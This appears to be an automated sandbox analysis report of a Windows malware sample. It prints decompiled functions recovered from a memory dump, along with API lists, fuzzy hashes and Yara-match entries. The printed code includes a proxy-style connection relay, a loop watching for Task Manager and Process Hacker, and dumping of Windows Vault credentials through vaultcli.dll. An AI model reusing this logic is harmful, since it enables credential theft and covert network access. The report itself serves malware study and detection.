                                  • Opcode ID: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
                                  • Instruction ID: da810012986fcb6c8d8d394bbe01705385cba6e4fa72d30e5428379b1b1cd6da
                                  • Opcode Fuzzy Hash: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
                                  • Instruction Fuzzy Hash: 59F0A7B5784304BAEB509B46DC46FDB3BBC9755B04F200079BA05B11C2D2B49A45952C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041046E, Relevance: 7.7, APIs: 5, Instructions: 192COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0041046E(intOrPtr __ecx) {
				char _v5;
				char _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v32;
				signed int _v36;
				long _v40;
				char _v49;
				char _v52;
				intOrPtr _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v100;
				char _v2156;
				void* _t61;
				char _t64;
				intOrPtr _t70;
				signed int _t77;
				void* _t87;
				void* _t95;
				void* _t99;
				signed int _t100;
				signed int _t102;
				void* _t111;
				signed int _t115;
				void* _t119;
				intOrPtr _t123;
				void* _t133;
				void* _t134;
				void* _t137;

				 *0x559cac = __ecx;
				while(1) {
					_t61 = E0041075C( &_v100);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *0x426755 == 0) {
						break;
					}
					_t99 = 0xc;
					_v5 = 0;
					_t95 = E00406099(_t99);
					if(_t95 == 0) {
						_t95 = 0;
					} else {
						asm("stosd");
						asm("stosd");
						asm("stosd");
					}
					_t100 = _v32;
					_t3 = 0x426980 + _t100 * 0xc; // 0x426980
					_t119 = _t3;
					if( *_t119 != _t100) {
						_t64 = _v5;
					} else {
						_t64 = 1;
						_t95 = _t119;
					}
					if(_t64 != 0) {
						if( *((char*)(_t95 + 4)) != 1) {
							_t130 = _v24;
							__imp__#19( *(_t95 + 8), _v24, _v28, 0);
						} else {
							E00401052( &_v2156, 0, 0x802);
							_v20 = _v20 & 0;
							_v16 = _v16 & 0;
							_t102 = 8;
							memset( &_v84, 0, _t102 << 2);
							_t137 = _t137 + 0x18;
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_t123 = _v24;
							_t70 =  *((intOrPtr*)(_t123 + 3));
							if(_t70 != 1) {
								if(_t70 != 3) {
									if(_t70 == 4) {
										__imp__InetNtopW(0x17, _t123 + 4,  &_v2156, 0x802);
										_t77 = E0041085B(_t123 + 4,  *(_t123 + 8) & 0x0000ffff);
										goto L18;
									}
								} else {
									E00401052( &_v84, 0, 0x20);
									_v80 = 2;
									_v76 = 1;
									_v72 = 6;
									_t133 = E00401085(0x200);
									E0040102C(_t133, _t123 + 5,  *((char*)(_t123 + 4)));
									_v36 = _v36 & 0x00000000;
									E0040102C( *((char*)(_t123 + 4)) + _t133,  &_v36, 1);
									_t137 = _t137 + 0x28;
									_t87 =  &_v84;
									__imp__getaddrinfo(_t133, 0, _t87,  &_v20);
									if(_t87 == 0) {
										_t115 =  *( *((char*)(_t123 + 4)) + _t123 + 5) & 0x0000ffff;
										_t111 =  *((intOrPtr*)(_v20 + 0x18)) + 4;
										goto L12;
									}
								}
							} else {
								_t134 = _t123 + 4;
								__imp__InetNtopW(2, _t134,  &_v2156, 0x802);
								_t115 =  *(_t123 + 8) & 0x0000ffff;
								_t111 = _t134;
								L12:
								_t77 = E004108DC(_t111, _t115);
								L18:
								_v16 = _t77;
							}
							_v52 = 5;
							_v49 = 1;
							E004106F9( &_v52, 0xa, _v32);
							 *(_t95 + 8) = _v16;
							 *((char*)(_t95 + 4)) = 2;
							_v40 = 0;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							CreateThread(0, 0, E0041068D, _t95, 0,  &_v40);
							_t130 = _v24;
						}
						E00401099(_t130);
					} else {
						_v12 = 5;
						E004106F9( &_v12, 2, _t100);
						 *((char*)(_t95 + 4)) = 1;
						 *_t95 = _v32;
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
				}
				return _t61;
			}




































                                  0x00410477
                                  0x00410669
                                  0x0041066d
                                  0x0041067f
                                  0x00410680
                                  0x00410681
                                  0x00410682
                                  0x00000000
                                  0x00000000
                                  0x00410487
                                  0x00410488
                                  0x00410491
                                  0x00410495
                                  0x004104a0
                                  0x00410497
                                  0x0041049b
                                  0x0041049c
                                  0x0041049d
                                  0x0041049d
                                  0x004104a2
                                  0x004104a8
                                  0x004104a8
                                  0x004104b0
                                  0x004104b8
                                  0x004104b2
                                  0x004104b2
                                  0x004104b4
                                  0x004104b4
                                  0x004104bd
                                  0x004104e8
                                  0x00410650
                                  0x0041065c
                                  0x004104ee
                                  0x004104fc
                                  0x00410509
                                  0x0041050c
                                  0x00410511
                                  0x00410512
                                  0x00410512
                                  0x00410517
                                  0x00410518
                                  0x00410519
                                  0x0041051b
                                  0x0041051e
                                  0x00410523
                                  0x0041054f
                                  0x004105d9
                                  0x004105ed
                                  0x004105f9
                                  0x00000000
                                  0x004105f9
                                  0x00410555
                                  0x0041055d
                                  0x00410567
                                  0x0041056e
                                  0x00410575
                                  0x00410585
                                  0x0041058d
                                  0x00410592
                                  0x004105a3
                                  0x004105a8
                                  0x004105af
                                  0x004105b6
                                  0x004105be
                                  0x004105c4
                                  0x004105cf
                                  0x00000000
                                  0x004105cf
                                  0x004105be
                                  0x00410525
                                  0x00410531
                                  0x00410537
                                  0x0041053d
                                  0x00410541
                                  0x00410543
                                  0x00410543
                                  0x004105fe
                                  0x004105fe
                                  0x004105fe
                                  0x0041060a
                                  0x00410610
                                  0x00410614
                                  0x00410623
                                  0x0041062e
                                  0x00410635
                                  0x0041063a
                                  0x00410642
                                  0x00410644
                                  0x00410645
                                  0x0041064b
                                  0x0041064b
                                  0x00410663
                                  0x004104bf
                                  0x004104c5
                                  0x004104cb
                                  0x004104d5
                                  0x004104d9
                                  0x004104dc
                                  0x004104dd
                                  0x004104de
                                  0x004104de
                                  0x00410668
                                  0x0041068c

                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: b5c0599b6a21f609f48be6335f6a61c6e2d9c779c1fd2f504f0cb0282a1048da
                                  • Instruction ID: a997fb7a83d2290818e28b31fbf57bc7f8b037a2cfd84f52b4588474c50995db
                                  • Opcode Fuzzy Hash: b5c0599b6a21f609f48be6335f6a61c6e2d9c779c1fd2f504f0cb0282a1048da
                                  • Instruction Fuzzy Hash: 8961D871904218EEDB10CF95CC45BEFB7B9BF04304F00816AF945BB281D7B9A985CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F086, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 90sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040F086() {
				signed int _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t26;
				void* _t29;
				signed int _t32;
				signed int _t35;
				void* _t42;
				void* _t56;
				void* _t58;
				void* _t59;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				void* _t64;

				_t64 = (_t62 & 0xfffffff8) - 0x1c;
				_t42 = 0;
				_v16 = _v16 & 0;
				_t56 = 0;
				_v8 = _v8 & 0;
				L1:
				_t26 = E00412155(E004036F7( &_v28, L"explorer.exe"));
				_t45 = _v32;
				_t58 = _t26;
				E00405FEB(_v32);
				_v32 = _v32 & 0x00000000;
				if(_t58 != 0 && _t58 != _t56) {
					_t56 = _t58;
					E00407B2E(_t45, _t45, _t58);
					_t64 = _t64 + 0xc;
				}
				_t29 = E00412155(E004036F7( &_v24, L"TASKmgr.exe"));
				_t48 = _v28;
				_t59 = _t29;
				E00405FEB(_v28);
				_v28 = _v28 & 0x00000000;
				if(_t59 != 0 && _t59 != _t42) {
					_t42 = _t59;
					E00407B2E(_t48, _t48, _t59);
					_t64 = _t64 + 0xc;
				}
				_t32 = E00412155(E004036F7( &_v20, L"ProcessHacker.exe"));
				_t51 = _v24;
				_t60 = _t32;
				E00405FEB(_v24);
				_v24 = _v24 & 0x00000000;
				if(_t60 != 0 && _t60 != _v16) {
					_v16 = _t60;
					E00407B2E(_t51, _t51, _t60);
					_t64 = _t64 + 0xc;
				}
				_t35 = E00412155(E004036F7( &_v12, L"regedit.exe"));
				_t54 = _v16;
				_t61 = _t35;
				E00405FEB(_v16);
				_v16 = _v16 & 0x00000000;
				if(_t61 != 0 && _t61 != _v8) {
					_v8 = _t61;
					E00407B2E(_t54, _t54, _t61);
					_t64 = _t64 + 0xc;
				}
				Sleep(0x3e8);
				goto L1;
			}






















                                  0x0040f08c
                                  0x0040f091
                                  0x0040f093
                                  0x0040f098
                                  0x0040f09a
                                  0x0040f09e
                                  0x0040f0ae
                                  0x0040f0b3
                                  0x0040f0b7
                                  0x0040f0b9
                                  0x0040f0be
                                  0x0040f0c5
                                  0x0040f0ce
                                  0x0040f0d0
                                  0x0040f0d5
                                  0x0040f0d5
                                  0x0040f0e8
                                  0x0040f0ed
                                  0x0040f0f1
                                  0x0040f0f3
                                  0x0040f0f8
                                  0x0040f0ff
                                  0x0040f108
                                  0x0040f10a
                                  0x0040f10f
                                  0x0040f10f
                                  0x0040f122
                                  0x0040f127
                                  0x0040f12b
                                  0x0040f12d
                                  0x0040f132
                                  0x0040f139
                                  0x0040f144
                                  0x0040f148
                                  0x0040f14d
                                  0x0040f14d
                                  0x0040f160
                                  0x0040f165
                                  0x0040f169
                                  0x0040f16b
                                  0x0040f170
                                  0x0040f177
                                  0x0040f182
                                  0x0040f186
                                  0x0040f18b
                                  0x0040f18b
                                  0x0040f193
                                  0x00000000

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00412155: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                    • Part of subcall function 00412155: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                    • Part of subcall function 00412155: CloseHandle.KERNEL32(00000000), ref: 004121C1
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • Sleep.KERNEL32(000003E8), ref: 0040F193
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CloseCreateFirstFreeHandleProcess32SleepSnapshotToolhelp32Virtuallstrcpy
                                  • String ID: ProcessHacker.exe$TASKmgr.exe$explorer.exe$regedit.exe
                                  • API String ID: 1522922855-2180853415
                                  • Opcode ID: 7173c65b3d221aa96aaa846a7a9ffc8452488f4e1cccf0dcc11cdd1b8507cc7e
                                  • Instruction ID: 1100a8f027d8646bfe9cbc7498619969e67dd2afa5e15d5111ff53f3380e378b
                                  • Opcode Fuzzy Hash: 7173c65b3d221aa96aaa846a7a9ffc8452488f4e1cccf0dcc11cdd1b8507cc7e
                                  • Instruction Fuzzy Hash: 6321C471D053516BC724FF21C946AAFB6949F84759F040A3EF844733C2EA7CAE09C69A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004103B9, Relevance: 7.6, APIs: 5, Instructions: 70networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WS2_32(00000002,00000001,00000006), ref: 004103D3
                                  • gethostbyname.WS2_32(?), ref: 004103DC
                                  • htons.WS2_32(?), ref: 00410400
                                  • InetNtopW.WS2_32(00000002,?,?,00000802), ref: 00410431
                                  • connect.WS2_32(00000000,?,00000010), ref: 0041044A
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InetNtopconnectgethostbynamehtonssocket
                                  • String ID:
                                  • API String ID: 2393792429-0
                                  • Opcode ID: c85bbde7853d1e0dd836cd2d5e75085cc4800a1032bbd5787e48c5e879d75bec
                                  • Instruction ID: 727c1264bc9e30e98f597feacc0b668f5efde6c0f62ffec738b6da8cc58ee6c9
                                  • Opcode Fuzzy Hash: c85bbde7853d1e0dd836cd2d5e75085cc4800a1032bbd5787e48c5e879d75bec
                                  • Instruction Fuzzy Hash: 851103B2900258BBE71097A4AC4AFEB7BBCEF05724F008476FD55D7191E6B4894487A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041221F, Relevance: 7.5, APIs: 5, Instructions: 44processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041221F(signed int* __ecx, void* __edx) {
				char _v524;
				intOrPtr _v552;
				void* _v560;
				struct tagPROCESSENTRY32W* _t8;
				void* _t14;
				void* _t18;
				signed int* _t19;

				_t14 = __edx;
				_v560 = 0x22c;
				_t19 = __ecx;
				_t18 = CreateToolhelp32Snapshot(2, 0);
				if(_t18 == 0xffffffff) {
					L6:
					 *_t19 =  *_t19 & 0x00000000;
				} else {
					_t8 =  &_v560;
					Process32FirstW(_t18, _t8);
					while(_t8 != 0) {
						if(_v552 == _t14) {
							CloseHandle(_t18);
							E004036F7(_t19,  &_v524);
						} else {
							_t8 = Process32NextW(_t18,  &_v560);
							continue;
						}
						goto L7;
					}
					CloseHandle(_t18);
					goto L6;
				}
				L7:
				return _t19;
			}










                                  0x0041222f
                                  0x00412231
                                  0x0041223b
                                  0x00412243
                                  0x00412248
                                  0x0041227b
                                  0x0041227b
                                  0x0041224a
                                  0x0041224a
                                  0x00412252
                                  0x00412270
                                  0x00412260
                                  0x00412286
                                  0x00412295
                                  0x00412262
                                  0x0041226a
                                  0x00000000
                                  0x0041226a
                                  0x00000000
                                  0x00412260
                                  0x00412275
                                  0x00000000
                                  0x00412275
                                  0x0041227f
                                  0x00412284

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041223D
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412252
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041226A
                                  • CloseHandle.KERNEL32(00000000), ref: 00412275
                                  • CloseHandle.KERNEL32(00000000), ref: 00412286
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 1789362936-0
                                  • Opcode ID: e32333b86ea98e8debf8d87e9ca123abf85733d7f1adc30fc4469acb21f4305d
                                  • Instruction ID: debd20abf717d3e205526d08b8a6d3eb8db8cce60d0d25a78bdd72c07f1bd50f
                                  • Opcode Fuzzy Hash: e32333b86ea98e8debf8d87e9ca123abf85733d7f1adc30fc4469acb21f4305d
                                  • Instruction Fuzzy Hash: BE01D6312042147BCB205BA4AC4DBFE77BCAB48761F1080AAF505D2290D7B889828A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B10E, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B10E(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}





                                  0x0040b117
                                  0x0040b11f
                                  0x0040b129
                                  0x0040b12f
                                  0x0040b137
                                  0x0040b13d
                                  0x0040b145
                                  0x0040b14b
                                  0x0040b153
                                  0x0040b159
                                  0x0040b15b
                                  0x0040b164

                                  APIs
                                  • FreeLibrary.KERNEL32(?,00000001,?,00000000,0040A897), ref: 0040B11F
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B12F
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B13D
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B14B
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B159
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID:
                                  • API String ID: 3664257935-0
                                  • Opcode ID: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction ID: 9f7ef04137cd162203068e8b633458ffaa87eefdd020305409dbc26cee2ce42b
                                  • Opcode Fuzzy Hash: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction Fuzzy Hash: 7AF0A571B04B16BED7495F758C84B86FE6AFF49260F01462B952C42221CB716434DFD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AD8C, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040AD8C(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}





                                  0x0040ad95
                                  0x0040ad9d
                                  0x0040ada7
                                  0x0040adad
                                  0x0040adb5
                                  0x0040adbb
                                  0x0040adc3
                                  0x0040adc9
                                  0x0040add1
                                  0x0040add7
                                  0x0040add9
                                  0x0040ade2

                                  APIs
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040AD9D
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADAD
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADBB
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADC9
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADD7
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID:
                                  • API String ID: 3664257935-0
                                  • Opcode ID: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction ID: 9f7ef04137cd162203068e8b633458ffaa87eefdd020305409dbc26cee2ce42b
                                  • Opcode Fuzzy Hash: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction Fuzzy Hash: 7AF0A571B04B16BED7495F758C84B86FE6AFF49260F01462B952C42221CB716434DFD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A968, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 252COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E0040A968(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v92;
				char _v96;
				char _v100;
				void* _t124;
				void* _t127;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t147;
				void* _t148;
				void* _t159;
				void* _t162;
				void* _t186;
				char _t226;
				intOrPtr _t229;
				char _t234;
				void* _t235;

				_t234 = 0;
				_t186 = __ecx;
				_t226 = 0;
				_v16 = 0;
				_v44 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v84 = 0;
				if(E0040ACBE(__ecx) != 0) {
					_push( &_v16);
					_push(0);
					_push(0x41c150);
					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
						_push( &_v20);
						_push( &_v44);
						_push(0x200);
						_push(_v16);
						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
							_t240 = _v44;
							if(_v44 != 0) {
								_v80 = 0;
								_v40 = 0;
								_v36 = 0;
								do {
									_t124 = E0040AC8B(_t240);
									_push(0x10);
									_push(0x41c140);
									if(_t124 == 0) {
										_push(_t226);
										_v28 = _v20 + _v40;
										_t127 = E00401000();
										_t235 = _t235 + 0xc;
										__eflags = _t127;
										if(__eflags == 0) {
											E004036F7( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
											_t133 = E0040335A( &_v32, E004036F7( &_v64, L"Internet Explorer"));
											E00405FEB(_v64);
											_v64 = _t234;
											__eflags = _t133;
											if(__eflags != 0) {
												asm("movaps xmm0, [0x41a910]");
												asm("movups [ebp-0x60], xmm0");
												E00403549( &_v100, E004036F7( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
												E00405FEB(_v68);
												_v68 = _t234;
												E00403549( &_v96, E004036F7( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
												E00405FEB(_v72);
												_v12 = _t234;
												_t147 = _v28;
												_v72 = _t234;
												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
												__eflags = _t148;
												if(_t148 == 0) {
													_v8 = _v12;
													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
													E00403549( &_v84, E004036F7( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
													E00405FEB(_v76);
													_v76 = _t234;
												}
												_t235 = _t235 - 0x10;
												E00401FF2(_t235,  &_v100);
												E00402028(_t186);
												E00401441( &_v100);
											}
											E00405FEB(_v32);
											_v32 = _t234;
											goto L18;
										}
									} else {
										_t226 = _v36 + _v20;
										_push(_t226);
										_v8 = _t226;
										_t159 = E00401000();
										_t235 = _t235 + 0xc;
										if(_t159 == 0) {
											E004036F7( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
											_t162 = E0040335A( &_v24, E004036F7( &_v48, L"Internet Explorer"));
											E00405FEB(_v48);
											_v48 = _t234;
											if(_t162 != 0) {
												_t229 = _v8;
												asm("movaps xmm0, [0x41a910]");
												asm("movups [ebp-0x60], xmm0");
												E00403549( &_v100, E004036F7( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
												E00405FEB(_v52);
												_v52 = _t234;
												E00403549( &_v96, E004036F7( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
												E00405FEB(_v56);
												_v12 = _t234;
												_push( &_v12);
												_push(_t234);
												_push(_t234);
												_push(_t234);
												_push( *((intOrPtr*)(_t229 + 0x18)));
												_v56 = _t234;
												_push( *((intOrPtr*)(_t229 + 0x14)));
												_push(_t229);
												_push(_v16);
												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
													_v8 = _v12;
													E00403549( &_v92, E004036F7( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
													E00405FEB(_v60);
													_v60 = _t234;
												}
												_t235 = _t235 - 0x10;
												E00401FF2(_t235,  &_v100);
												E00402028(_t186);
												E00401441( &_v100);
											}
											E00405FEB(_v24);
											_v24 = _t234;
											L18:
											_t226 = _v8;
										}
									}
									_v36 = _v36 + 0x38;
									_t129 = _v80 + 1;
									_v40 = _v40 + 0x34;
									_v80 = _t129;
								} while (_t129 < _v44);
								_t234 = _v84;
							}
						}
					}
				}
				if(_v20 != 0) {
					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
				}
				if(_v16 != 0) {
					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
				}
				FreeLibrary( *(_t186 + 0xc0));
				E00405FEB(_t234);
				E00405FEB(0);
				return E00405FEB(0);
			}







































                                  0x0040a970
                                  0x0040a972
                                  0x0040a975
                                  0x0040a977
                                  0x0040a97a
                                  0x0040a97d
                                  0x0040a980
                                  0x0040a983
                                  0x0040a986
                                  0x0040a990
                                  0x0040a999
                                  0x0040a99a
                                  0x0040a99b
                                  0x0040a9a8
                                  0x0040a9b1
                                  0x0040a9b5
                                  0x0040a9b6
                                  0x0040a9bb
                                  0x0040a9c6
                                  0x0040a9cf
                                  0x0040a9d1
                                  0x0040a9d7
                                  0x0040a9da
                                  0x0040a9dd
                                  0x0040a9e0
                                  0x0040a9e0
                                  0x0040a9e5
                                  0x0040a9e7
                                  0x0040a9ee
                                  0x0040ab12
                                  0x0040ab13
                                  0x0040ab16
                                  0x0040ab1b
                                  0x0040ab1e
                                  0x0040ab20
                                  0x0040ab2f
                                  0x0040ab45
                                  0x0040ab4f
                                  0x0040ab54
                                  0x0040ab57
                                  0x0040ab59
                                  0x0040ab65
                                  0x0040ab6c
                                  0x0040ab80
                                  0x0040ab88
                                  0x0040ab96
                                  0x0040aba3
                                  0x0040abab
                                  0x0040abb3
                                  0x0040abb7
                                  0x0040abc0
                                  0x0040abca
                                  0x0040abd0
                                  0x0040abd2
                                  0x0040abdd
                                  0x0040abe3
                                  0x0040abf0
                                  0x0040abf8
                                  0x0040abfd
                                  0x0040abfd
                                  0x0040ac00
                                  0x0040ac09
                                  0x0040ac10
                                  0x0040ac18
                                  0x0040ac18
                                  0x0040ac20
                                  0x0040ac25
                                  0x00000000
                                  0x0040ac25
                                  0x0040a9f4
                                  0x0040a9f7
                                  0x0040a9fa
                                  0x0040a9fb
                                  0x0040a9fe
                                  0x0040aa03
                                  0x0040aa08
                                  0x0040aa14
                                  0x0040aa2a
                                  0x0040aa34
                                  0x0040aa39
                                  0x0040aa3e
                                  0x0040aa44
                                  0x0040aa4a
                                  0x0040aa51
                                  0x0040aa65
                                  0x0040aa6d
                                  0x0040aa7b
                                  0x0040aa88
                                  0x0040aa90
                                  0x0040aa98
                                  0x0040aa9b
                                  0x0040aa9c
                                  0x0040aa9d
                                  0x0040aa9e
                                  0x0040aa9f
                                  0x0040aaa2
                                  0x0040aaa5
                                  0x0040aaa8
                                  0x0040aaa9
                                  0x0040aab4
                                  0x0040aabc
                                  0x0040aacf
                                  0x0040aad7
                                  0x0040aadc
                                  0x0040aadc
                                  0x0040aadf
                                  0x0040aae8
                                  0x0040aaef
                                  0x0040aaf7
                                  0x0040aaf7
                                  0x0040aaff
                                  0x0040ab04
                                  0x0040ac28
                                  0x0040ac28
                                  0x0040ac28
                                  0x0040aa08
                                  0x0040ac2e
                                  0x0040ac32
                                  0x0040ac33
                                  0x0040ac37
                                  0x0040ac3a
                                  0x0040ac43
                                  0x0040ac43
                                  0x0040a9d1
                                  0x0040a9c6
                                  0x0040a9a8
                                  0x0040ac4a
                                  0x0040ac4f
                                  0x0040ac4f
                                  0x0040ac59
                                  0x0040ac5f
                                  0x0040ac5f
                                  0x0040ac6b
                                  0x0040ac73
                                  0x0040ac7a
                                  0x0040ac8a

                                  APIs
                                    • Part of subcall function 0040ACBE: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040ACC6
                                  • FreeLibrary.KERNEL32(?), ref: 0040AC6B
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040335A: lstrcmpW.KERNEL32(?,?), ref: 00403364
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                  • String ID: 4$8$Internet Explorer
                                  • API String ID: 708496175-747916358
                                  • Opcode ID: f0b137eeb553d2f1686f0a6703045c04bc83a72f38a3950f8389df93ccf35f68
                                  • Instruction ID: a99aea2a735c9718559e27865e5f0cd770b9fcd1e9f38770a9e7eda6b777dcf3
                                  • Opcode Fuzzy Hash: f0b137eeb553d2f1686f0a6703045c04bc83a72f38a3950f8389df93ccf35f68
                                  • Instruction Fuzzy Hash: 98A13D70D00219ABCF14EFA6CC869EEBB79FF04708F14442AF401B7291DB78AA55CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

